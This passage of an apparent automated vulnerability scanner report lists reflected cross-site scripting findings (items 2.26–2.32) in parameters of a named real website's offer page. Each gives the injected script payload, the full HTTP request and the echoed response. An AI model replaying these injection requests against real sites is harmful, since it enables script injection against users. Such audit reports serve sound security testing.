User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:14 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=v41mjjvjtb395bfee89ffekb73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=6c92a"><script>alert(1)</script>7d4cd1323ce&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e17
...[SNIP]...

2.26. http://www.vcahospitals.com/main/offer [formtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d982d"><script>alert(1)</script>197f4942bd8 was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORPd982d"><script>alert(1)</script>197f4942bd8&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=koa2mkuvdq1cjng1duqsnnc194; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORPd982d"><script>alert(1)</script>197f4942bd8&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bc
...[SNIP]...

2.27. http://www.vcahospitals.com/main/offer [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5d2e"><script>alert(1)</script>46361887d43 was submitted in the gclid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwc5d2e"><script>alert(1)</script>46361887d43 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:45 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=6h96hdei9ppruniesbkufjpql5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwc5d2e"><script>alert(1)</script>46361887d43" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.28. http://www.vcahospitals.com/main/offer [guid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e65"><script>alert(1)</script>2aa17c446a7 was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284e1e65"><script>alert(1)</script>2aa17c446a7 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:09 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284e1e65"><script>alert(1)</script>2aa17c446a7" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.29. http://www.vcahospitals.com/main/offer [ipaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cea7b"><script>alert(1)</script>d52b0fd037e was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243cea7b"><script>alert(1)</script>d52b0fd037e&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=uefdkgce6dqe7oss7nrn93f4p3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243cea7b"><script>alert(1)</script>d52b0fd037e&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2
...[SNIP]...

2.30. http://www.vcahospitals.com/main/offer [lname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f871"><script>alert(1)</script>0ec73ab7706 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=6f871"><script>alert(1)</script>0ec73ab7706&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=if7jtr5gtqf6aveee5163p5q63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=6f871"><script>alert(1)</script>0ec73ab7706&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2
...[SNIP]...

2.31. http://www.vcahospitals.com/main/offer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79ed5"><script>alert(1)</script>092fe4b7483 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw&79ed5"><script>alert(1)</script>092fe4b7483=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=oiivkiojrucik62g0md3t4kjd6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw&79ed5"><script>alert(1)</script>092fe4b7483=1" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.32. http://www.vcahospitals.com/main/offer [newmex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the newmex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd11"><script>alert(1)</script>bb1f3698051 was submitted in the newmex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=04cd11"><script>alert(1)</script>bb1f3698051&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%2525252